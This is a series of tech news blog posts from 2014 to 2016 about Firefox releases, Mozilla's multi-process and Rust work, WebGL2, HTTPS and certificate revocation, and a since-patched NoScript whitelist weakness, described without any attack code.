Mozilla Launches Firefox 49

Subject: General Tech | September 20, 2016 - 04:51 PM |
Tagged: mozilla, firefox

While it was originally scheduled for last week, some last-minute issues preventing the software non-profit organization from releasing it until today. Also, for some reason, Firefox for Android doesn't want to update from within itself, but triggering an update from the Google Play store works. This might be temporary and/or happens with every Firefox for Android update; I'm new to this platform.

Mozilla_Firefox_logo_2013.png

This version is expected to expand their multi-process support, which separates UI updates from site updates. Typically, Firefox disables the feature with add-ons, because they are given the tools to make decoupling these two spaces... glitchy. Under typical situations, JavaScript and other tasks that run in the page shouldn't affect the browser's interface. You can see how this could be a problem if, for instance, an add-on loops between tasks on both at the same time. As such, Mozilla is pulling access to a few APIs when multi-process is enabled.

With Firefox 49, VentureBeat is reporting that Mozilla is allowing a “small initial set of compatible add-ons” to be enabled alongside multi-process. If you don't have any non-compatible add-ons installed, then you should see Multiprocess Windows enabled in about:support. Otherwise, it will be disabled and you won't see any difference.

Interestingly, Mozilla is promoting "Refresh Firefox" at their site if you have the latest version. This basically cleans all the add-ons out of your user profile, but maintains browsing history, bookmarks, and the like. It might have been around for a while, but, if it's new, it times nicely with the multi-process rollout. On top of cleaning out old, crufty add-ons, a user should see a bigger jump when Mozilla's enhancements are (I'm guessing) enabled.

Mozilla has also changed a few things here and there, too. While many of our readers will probably have hardware acceleration for video, they have just added in SSSE3 enhancements if GPU support isn't available. I'm not sure all of the use cases for this, but I'd expect it would help in virtualized environments and certain, older PCs (ex: Intel Atom and Via Nano). I'm just speculating, though.

Source: Mozilla

Mozilla to Publish First Rust-based Module in Firefox 48

Subject: General Tech | July 16, 2016 - 05:41 PM |
Tagged: mozilla, Rust, firefox

Mozilla has been working on the Rust language for several years now. It is designed to be extremely fast, memory-safe, and easy to parallelize on multi-core processors, doing so by having a compiler that's not afraid to tell you “Nope.” Mozilla (and others, like Samsung) want a language with those characteristics because it will make an extremely fast, yet secure, web browser (although there's a lot of single-threaded design choices tangled in the Web specifications).

mozilla-rust.png

The first example will arrive next month for Windows, though (64-bit OSX and Linux already had it). Firefox 48 will replace a small portion of the code, originally written in C++, with a Rust-based equivalent. The affected component parses media files, getting values like track id, duration, resolution, and so forth. Because it's written in Rust, this ingestion should be resilient to memory-based vulnerabilities.

This probably will not be noticeable to end-users, but it's a few thousand less lines of code that Mozilla should need to worry about hijacking the browser. Mozilla is also planning on bringing URL parsing to Rust, and has already done so with Servo. You would think that the C++ code has been battle-hardened by now, but, I mean, 15-year-old open-source bugs do exist, hiding in plain sight.

Source: Mozilla

Mozilla Will Begin Electrolysis with Firefox 48

Subject: General Tech | June 9, 2016 - 01:08 AM |
Tagged: mozilla, firefox

Electrolysis (e10s) is Mozilla's codename for their multi-process initiative in Firefox. The main goal of this is to separate the content of the website from the user interface. This means that, if a site has long-running JavaScript or layout, Firefox will not lock up. This seems like a simple idea, except that it undoes over a decade of assumptions that were made during Firefox's development. Imagine, for instance, that you have an extensions which modifies both the browser UI as well as the page content -- that's a single script that needs to be run across multiple threads. Whoops!

Mozilla_Firefox_logo_2013.png

This roll-out won't necessarily be immediate, though. You can install Firefox 48 and, only some weeks later, get Electrolysis turned on retroactively. They are starting with about 1% of eligible users, which will ramp up to all eligible users over time or even be disabled if alarm bells start to ring.

Speaking of eligible users, there are quite a few conditions that will prevent you from getting Electrolysis. Namely, if you use extensions (it's unclear if they're talking about all extensions, or just ones that use certain APIs) then you will be kept on single-process. They don't specify why, but it could very well be the situation that I mentioned in the first paragraph.

Firefox 48 is scheduled to be released in six weeks (the first week of August).

WebGL2 Is On Its Way

Subject: General Tech | December 31, 2015 - 10:25 PM |
Tagged: webgl2, webgl, mozilla, firefox

The Khronos Group created WebGL to bring a GPU-accelerated platform to web browsers. With a few minor differences, it is basically JavaScript bindings for OpenGL ES 2.0. It also created a few standards in JavaScript itself to support things like raw buffers of data that could be assigned types in an unmanaged way. Basically every latest-version web browser supports it these days, and we're starting to see it used in interesting ways.

webgl2-2015-particles.jpg

The next step is WebGL2. OpenGL ES 3.0 adds a bunch of new features that are sorely needed for modern games and applications. For instance, it allows drawing to multiple render targets, which is very useful for virtual cameras in video games (although the original WebGL software could access this as an optional extension when supported). The addition of “Uniform Buffer Objects” is a better example. This allows you to store a bunch of data, like view transformation matrices, as a single buffer that can be bound to multiple applications, rather than binding them one at a time to every draw that needs them.

It's hard to describe, but demos speak a thousand words.

The news today is that Mozilla Nightly now ships with WebGL2 enabled by default. It was previously hidden, disabled by default, behind an option in the browser. This doesn't seem like a big deal, but one of the largest hurdles to WebGL2 is how the browsers actually implement it. The shading language in WebGL was simple enough that most browsers convert it to DirectX HLSL on Windows. This is said to have the added advantage of obfuscating the ability to write malicious code, since developers never directly writes what's executed. GLSL in OpenGL ES 3.0 is much more difficult. I'm not sure whether the browsers will begin to trust OpenGL ES 3.0 drivers directly, or if they finally updated the GLSL translator, but supported implementations means that something was fixed.

Unfortunately, OpenGL compute shaders are not supported in WebGL2. That said, the biggest hurdle is, again, to get WebGL2 working at all. From my talks with browser vendors over the last year or so, it sounds like features (including compute shaders) should start flying in easily once this hurdle is cleared. From there, GPGPU in a website should be much more straightforward.

Almost NoScript Exploits Whitelist Vulnerabilities

Subject: General Tech | July 6, 2015 - 07:01 AM |
Tagged: noscript, javascript, firefox

I do not really believe in disabling JavaScript, although the ability to control or halt execution would be nice, but you can use an extension to remove it entirely if you want. I say this because the upcoming story talks about vulnerabilities in the NoScript extension, which locks down JavaScript and other, non-static content. By “vulnerabilities”, we mean the ability to execute JavaScript, which every major browser vendor defaults on because they consider it safe for their users on its own.

NoScript.png

This is like a five-year-old figuring out how to unlock a fireworks case full of paper crackers.

Regardless, there are two vulnerabilities, both of which have already been updated. Both of them take advantage of the whitelist functionality to ignore malicious code. By default, NoScript trusts a handful of domains, because blocking every script ever would break too much of the internet.

The first problem is that the whitelist has a little cruft, some of which including domain names that are useless, and even some that have expired into the public domain for sale. To prove a point, Matthew Bryant purchased zendcdn.net and used it to serve his own JavaScript. The second problem is similar, but slightly different. Rather than finding a domain that expired, it found some whitelist entries, such as googleapis.com, that had sub-domains, storage.googleapis.com, which is a service that accepts untrusted user scripts (it is part of Google's Cloud Platform).

Again, even though JavaScript is about as secure as you can get in an executable language, you should be allowed to control what executes on your machine. As stated, NoScript has already addressed these issues in a recent update.

Firefox 38 Launches with (and also without) DRM Support

Subject: General Tech | May 13, 2015 - 05:06 PM |
Tagged: mozilla, firefox, DRM

Mozilla has just released Firefox 38. With it comes the controversial Adobe Primetime DRM implementation through the W3C's Encrypted Media Extensions (EME). Or, maybe not. If you upgrade the browser through one of the default channels, the Adobe Primetime Content Decryption Module will appear in the Plugins tab of your Add-ons manager on Windows Vista or later (but it might take a few minutes after the upgrade).

Mozilla_Firefox_logo_2013.png

Alternatively, you can use Mozilla's EME-free installer for Firefox and avoid it altogether.

I have mentioned my concerns about DRM in the past. EME does not particularly bother me, because it is just a plugin architecture, but the fundamental concept does. Simply put, copy protection does very little good and a whole lot of bad. If your movie is leaked before it is legally available in consumer's hands, as it regularly does, then what do you expect to accomplish after the fact? It takes one instance to be copied infinitely, and that often comes from the film company's own supply chain, not their customers. Moreover, it is found to reduce sales and hurt customer experience (above and beyond the valid ideological concerns).

Beyond the DRM inclusion, several new features were added. One of the more interesting ones is BroadcastChannel API. This standard allows a web application to share data between “contexts” that have the same “user agent and origin”. In other words, it must be on the same browser and using the same app (even secondary instances of it). This will allow sites to do multi-monitor split screen, which is useful for games and utilities.

WebRTC has also been upgraded with multistream and renegotiation. Even though the general public thinks of WebRTC as a webcam and voice chat standard, it actually allows arbitrary data channels. For example, “BananaBread” is a first person shooter that used WebRTC to synchronize multiplayer state. Character and projectile position is very much not webcam or audio data, but WebRTC doesn't care.

Firefox 38 launched on May 12th with an optional, DRM-incompatible build.

Source: Mozilla

Forcing HTTPS Is Being Discussed

Subject: General Tech | April 14, 2015 - 08:08 PM |
Tagged: mozilla, http, https, firefox

On the Mozilla Dev-Platform Newsgroup, hosted at Google Groups, a proposal to deprecate insecure HTTP is being discussed. The idea is that HTTPS needs to be adopted and organizations will not do it without being pushed. The plan is to get browser vendors to refuse activating new features, and eventually disable old features, unless the site is loaded as a “privileged context”.

22-mozilla-2.jpg

This has sparked a debate, which was the whole point of course, about how secure do we want the Web to be. What features should we retroactively disable unless it is done through HTTPS? Things that access your webcam and microphone? Things that write to your hard drive? Then there is the question of how to handle self-signed certificates to get encryption without verification, and so forth.

Note: Websites cannot access or create files on your hard drive, but standards like localStorage and IndexedDB allow websites to have their own spaces for persistence. This is to allow, for instance, a 3D game to cache textures (and so forth) so you don't need to download them every time.

Personally, this concerns me greatly. I started helping Mozilla a couple of years ago, a few weeks after I saw Microsoft's Windows 8 developer certification program. I do not like the thought of someone being able to stifle creation and expression, and the web was looking like it might be the last bastion of unrestricted development for the general public.

In the original Windows Store requirements, no browser could exist unless it was a skin of Trident. This meant that, if a site didn't work in Internet Explorer, it didn't exist. If you didn't want to play by their rules? Your app didn't get signed and your developer certificate could even be revoked by Microsoft, or someone with authority over them. You could imagine the problems a LGBT-focused developer might have in certain countries, even if Microsoft likes their creations.

This is obviously not as bad as that. In the Windows Store case, there was one authority whereas HTTPS can be authenticated by numerous providers. Also, if self-signed certificates are deemed “secure enough”, it would likely avoid the problem. You would not need to ask one of a list of authorities permission to exist; you could secure the connection yourself. Of course, that is a barrier of skill for many, and that is its own concern.

So we'll see, but I hope that Mozilla will take these concerns as a top priority in their decisions.

Source: Mozilla

Since TLS connections mostly ignore OCSP, Firefox is creating yet another solution

Subject: General Tech | March 5, 2015 - 01:46 PM |
Tagged: security, OneCRL, irony, firefox, CRLSet, chrome

It seems somehow strange that the vast majority of 'secure' connections still completely ignore what were developed as industry standards to ensure security in favour of creating their own solutions but that is the world a security professional lives in.  The basic design of OCSP does carry with it a lot of extra bandwidth usage and while maintaining a time limited local cache, referred to as stapling, would ameliorate this your TLS connection is not likely to support that solution.  Instead of fixing the root cause and utilizing existing standards it would seem that Firefox 37 will start a brand new solution, maintaining a list of revoked certificates ironically called OneCRL which will be pushed out to Firefox users, duplicating the CRLSet which Chrome has already developed and maintains. 

This is good for the end user in that it does add security to their browsing session but for those truly worried about attempting to make the net a safer place it offers yet another list to keep track of and for attackers yet another vector of attack.  At some point we will have to stop referring to standards when referencing networking technology.  Pour through the links on the Slashdot post and read through the comments to share in the frustration or to familiarize yourself with these concepts if the acronyms are unfamiliar.

firefox-crset-onecrl.jpg

"The next version of Firefox will roll out a 'pushed' blocklist of revoked intermediate security certificates, in an effort to avoid using 'live' Online Certificate Status Protocol (OCSP) checks. The 'OneCRL' feature is similar to Google Chrome's CRLSet, but like that older offering, is limited to intermediate certificates, due to size restrictions in the browser."

Here is some more Tech News from around the web:

Tech Talk

Source: Slashdot

Mozilla Partners with Yahoo! for Five Year Search Deal

Subject: General Tech | November 20, 2014 - 10:10 PM |
Tagged: yahoo, mozilla, google, firefox

Mozilla, developer of the Firefox web browser, has been mostly funded by Google for the last decade. Between 2005 and 2011, the search giant slowly ramped up its contributions from around $50 million USD for a single year to just over $100 million for the last year. All of this money was to keep the default search engine set to Google for the location and search bar. At that time, journalists were voicing their concerns that Mozilla would be cut off after the success Google saw with their Chrome browser.

Mozilla_Firefox_logo_2013.png

In December 2011, Google and Mozilla surprised the world with a different announcement, $300 million dollars per year until November 2014, or almost three times their previous annual contributions. I could not help but feel it was like a light bulb that flares before it extinguishes, although later rumors claimed that Microsoft and Yahoo drove up Google's bid with high counter-offers. Of course, that deal ends this month and Google is no longer the winning bid, if they even proposed a deal at all.

This time, Yahoo won for the next five years (in the US) with a currently undisclosed sum. Yandex will be the default for Russia, and Baidu has been renewed as the default in China.

Yahoo also committed to supporting the Do Not Track (DNT) header for Firefox browsers. If your settings have DNT enabled, the search engine will adjust its behavior to acknowledge your request for privacy. One thing that has not been mentioned is how they will react to your request. This could be anything from treating you as completely anonymous, to personalizing your search results but not your ads, to personalizing your ads but not your search results, to only looking at the geographic location of your IP address, and so forth.

The search experience is not what you will get by going to the Yahoo homepage today; the new site was developed in collaboration with Mozilla and will launch for Firefox users in December. It will go live for every other Yahoo user in 2015.

Source: Mozilla

Mozilla Approves Plans for 64-Bit Firefox on Windows

Subject: General Tech | October 6, 2014 - 03:45 AM |
Tagged: windows, mozilla, firefox, 64-bit

If you had a reason, Mozilla has been compiling Firefox Nightly as a 64-bit application for Windows over the last several months. It is not a build that is designed for the general public; in fact, I believe it is basically only available to make sure that they did not horribly break anything during some arbitrary commit. That might change relatively soon, though.

Mozilla_Firefox_logo_2013.png

According to Mozilla's "internal", albeit completely public wiki, the non-profit organization is currently planning to release an official, 64-bit version of Firefox 37. Of course, all targets in Firefox are flexible and, ultimately, it is only done when it is done. If everything goes to schedule, that should be March 31st.

The main advantage is for high-performance applications (although there are some arguments for security, too). One example is if you open numerous tabs, to get Firefox's memory usage up, then attempt to load a Web applications like BananaBread. Last I tried, it will simply not load (unless you clean up memory usage somehow, like restarting the browser). It will run out of memory and just give up. You can see how this would be difficult for higher-end games, video editing utilities, and so forth. This will not be the case when 64-bit comes around.

If you are looking to develop a web app, be sure to check out the 64-bit Firefox Nightly builds. Unless plans change, it looks like you will have even more customers soon. This is unless, of course, you are targeting Mac OSX and Linux, which already have 64-bit binaries available. Also, why are you targeting specific operating systems with a website?

Source: Mozilla